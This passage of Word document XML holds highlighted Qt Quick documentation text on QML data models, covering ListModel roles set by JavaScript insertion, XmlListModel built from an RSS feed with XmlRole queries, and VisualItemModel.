          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These can be bound to by a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2579" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">delegate, for </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>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ListView</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fill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model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fruitModel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delegate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Row</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"Fruit: "</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"Cost: $"</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cost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490E7E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2580" w:anchor="listmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manipulate the</w:t>
      </w:r>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2581" w:anchor="listmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>directly via JavaScript</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the first item inserted determines the roles available to any views that are using the model. For </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, if an empty</w:t>
      </w:r>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2582" w:anchor="listmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is created and populated via JavaScript, the roles provided by the first insertion are the only roles that will be shown in the view:</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ListModel</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fruitModel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MouseArea</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fill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onClicked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fruitModel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append</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>({</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"cost"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5.95</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"name"</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Pizza"</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When the</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2583" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is clicked,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fruitModel</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will have two roles,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Even if subsequent roles are added, only the first two will be handled by views using the model. To reset the roles available in the model, call</w:t>
      </w:r>
      <w:r w:rsidR="001B3733">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2584" w:anchor="clear-method" w:history="1">
        <w:r w:rsidRPr="001B3733">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel::clear</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2299" w:name="xmllistmodel"/>
      <w:bookmarkStart w:id="2300" w:name="_Toc483001026"/>
      <w:bookmarkStart w:id="2301" w:name="_Toc483004017"/>
      <w:bookmarkStart w:id="2302" w:name="_Toc483604367"/>
      <w:bookmarkStart w:id="2303" w:name="_Toc483605587"/>
      <w:bookmarkEnd w:id="2299"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XmlListModel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2300"/>
      <w:bookmarkEnd w:id="2301"/>
      <w:bookmarkEnd w:id="2302"/>
      <w:bookmarkEnd w:id="2303"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2585" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows construction of a </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model from an XML data source</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The roles are specified via the</w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2586" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="001B3733">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. The type needs to be imported.</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="operator"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XmlListModel </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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The following model has three roles,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>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XmlListModel</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feedModel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source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"http://rss.news.yahoo.com/rss/oceania"</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query</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"/rss/channel/item"</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XmlRole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"title"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query</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"title/string()"</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XmlRole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"link"</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query</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"link/string()"</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XmlRole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name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"description"</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query</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"description/string()"</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The</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2587" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>RSS News demo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shows how</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2588" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can be used to display an </w:t>
      </w:r>
      <w:r w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> feed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="003903DE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2304" w:name="visualitemmodel"/>
      <w:bookmarkStart w:id="2305" w:name="_Toc483001027"/>
      <w:bookmarkStart w:id="2306" w:name="_Toc483004018"/>
      <w:bookmarkStart w:id="2307" w:name="_Toc483604368"/>
      <w:bookmarkStart w:id="2308" w:name="_Toc483605588"/>
      <w:bookmarkEnd w:id="2304"/>
      <w:r w:rsidRPr="003903DE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VisualItemModel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2305"/>
      <w:bookmarkEnd w:id="2306"/>
      <w:bookmarkEnd w:id="2307"/>
      <w:bookmarkEnd w:id="2308"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00490E7E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2589" w:anchor="visualitemmodel" w:history="1">
        <w:r w:rsidR="00630F70" w:rsidRPr="004A4AF0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>VisualItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004A4AF0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00630F70" w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows QML items to be provided as a model.</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 xml:space="preserve">This model contains </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4AF0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>both the data and delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; the child items of a</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2590" w:anchor="visualitemmodel" w:history="1">
        <w:r w:rsidRPr="00630F70">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>VisualItemModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provide the contents of the delegate. The </w:t>
      </w:r>
      <w:r w:rsidRPr="004A4AF0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model does not provide any roles</w:t>
      </w:r>
